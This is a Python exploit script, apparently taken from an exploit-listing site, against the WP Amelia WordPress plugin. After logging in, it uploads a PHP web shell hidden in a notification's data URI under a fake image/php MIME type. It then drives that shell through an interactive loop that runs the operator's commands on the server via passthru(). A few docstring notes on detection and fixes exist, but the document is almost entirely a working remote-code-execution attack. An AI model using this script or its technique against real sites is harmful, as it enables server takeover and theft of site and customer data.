## https://sploitus.com/exploit?id=WPEX-ID:3CF05815-9B74-4491-A935-D69A0834146C
import requests
import base64
BASE_URL = "http://localhost:8000"  # WordPress site root; as written it targets a local lab instance
# Credentials for the WordPress account that login() authenticates as. NOTE: `id` shadows the
# builtin of the same name; it is kept because login() is called with it at the bottom of the file.
id = "wordpress"
pw = "wordpress"
def login(id, pw) :
    """Authenticate to the WordPress instance at ``BASE_URL`` and return the session.

    Submits the standard ``wp-login.php`` form fields (``log``, ``pwd``, ``wp-submit``,
    ``testcookie``) over a fresh ``requests.Session`` so that any cookies the server
    sets are carried by later requests on the same session. The response body is
    read but never inspected, so a rejected login is not detected here.

    Args:
        id: WordPress username (name shadows the ``id`` builtin; kept for callers).
        pw: WordPress password.

    Returns:
        The ``requests.Session`` holding whatever cookies the login response set.
    """
    session = requests.Session()
    form = {
        "log": id,
        "pwd": pw,
        # Percent-encoded submit-button label, sent verbatim.
        "wp-submit": "%EB%A1%9C%EA%B7%B8%EC%9D%B8",
        "testcookie": "1",
    }
    response = session.post(f"{BASE_URL}/wp-login.php", data=form)
    # Force the body to be decoded, as the original did with a discarded ``.text``.
    _ = response.text
    return session
def exploit(sess: requests.Session) -> None :
    """Update WP Amelia notification #1 with a PHP-bearing data URI, then drive the resulting file.

    Flow as written: (1) POST a hand-built JSON notification object whose ``content``
    embeds ``<img src="data:image/php;,<base64>">`` carrying PHP to the Amelia API
    behind ``admin-ajax.php``; (2) take the ``content`` echoed back in the JSON
    response and slice out the ``src`` value, which is expected to now be a URL the
    server substituted for the data URI; (3) read commands from stdin in a loop and
    POST each one to that URL, printing the response body.

    Defender notes, limited to what this script sends and reads:
    - A request to ``admin-ajax.php?action=wpamelia_api&call=/notifications/<n>``
      whose JSON body contains ``data:image/php`` is a strong detection signal, as
      is a stored notification ``content`` whose ``<img src>`` no longer points at
      an image.
    - The chain depends on the server turning an arbitrary-MIME data URI into a
      fetchable file without validating type or extension; server-side allow-listing
      of image MIME types / extensions would break it (presumably what the vendor
      fix does — TODO confirm against the plugin's changelog).
    - An authenticated session from ``login`` is required; the capability level the
      endpoint checks is not visible from this script.

    Args:
        sess: a ``requests.Session`` already authenticated by ``login``.

    Returns:
        None. Loops until the operator types ``exit`` or ``quit``.
    """
    # PHP body that is base64-encoded into the data URI: it runs the POSTed ``qerogram``
    # field through passthru() and echoes the output.
    SHELLCODE = b"<?php echo(passthru($_POST['qerogram']));?>"
    # The notification object is serialized by hand as raw strings so the escaped
    # quotes inside ``content`` reach the server exactly as written.
    payload = r'''{"id":1,"name":"customer_appointment_approved","customName":null,"status":"enabled","type":"email","entity":"appointment","time":null,"timeBefore":null,"timeAfter":null,"sendTo":"customer","subject":"%service_name% Appointment Approved",'''
    # ``image/php`` is the declared (and false) MIME type of the data URI; the payload
    # bytes follow the comma as base64.
    payload += r'''"content":"<p>Dear <strong><img src=\"data:image/php;,''' + base64.b64encode(SHELLCODE).decode()
    payload += r'''\">%customer_full_name%</strong>,</p><p><br></p><p>You have successfully scheduled <strong>%service_name%</strong> appointment with <strong>%employee_full_name%</strong>. We are waiting you at <strong>%location_address% </strong>on <strong>%appointment_date_time%</strong>.</p><p><br></p><p>Thank you for choosing our company,</p><p><strong>%company_name%</strong></p>","translations":null,"entityIds":null,"sendOnlyMe":null}'''
    # The plugin's API is reached via admin-ajax; the body is sent as JSON text, not as
    # form fields, hence the explicit Content-Type.
    res = sess.post(
        f"{BASE_URL}/wp-admin/admin-ajax.php?action=wpamelia_api&call=/notifications/1",
        data = payload,
        headers = {"Content-Type": "application/json;charset=UTF-8"}
    )
    # The server echoes the stored content; the URL between ``src="`` and the next
    # double quote is what the loop below talks to.
    SHELL_ADDR = res.json()['data']['notification']['content']
    SHELL_ADDR = SHELL_ADDR[SHELL_ADDR.find('src="')+5:]
    SHELL_ADDR = SHELL_ADDR[:SHELL_ADDR.find('"')]
    # Interactive loop: each typed line is POSTed as form field ``qerogram`` and the
    # raw response body printed. ``exit``/``quit`` (any case) ends the loop.
    while True :
        cmd = input("$ ")
        if cmd.lower() == "exit" or cmd.lower() == "quit" :
            break
        res = sess.post(
            SHELL_ADDR,
            data = {"qerogram" : cmd}
        )
        print(res.text)
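if __name__ == "__main__":
    # Script entry point: authenticate once, then hand the cookie-bearing session to
    # exploit(). Guarded so importing this module (e.g. to reuse login()) does not
    # issue any network requests as a side effect.
    sess = login(id, pw)
    exploit(sess)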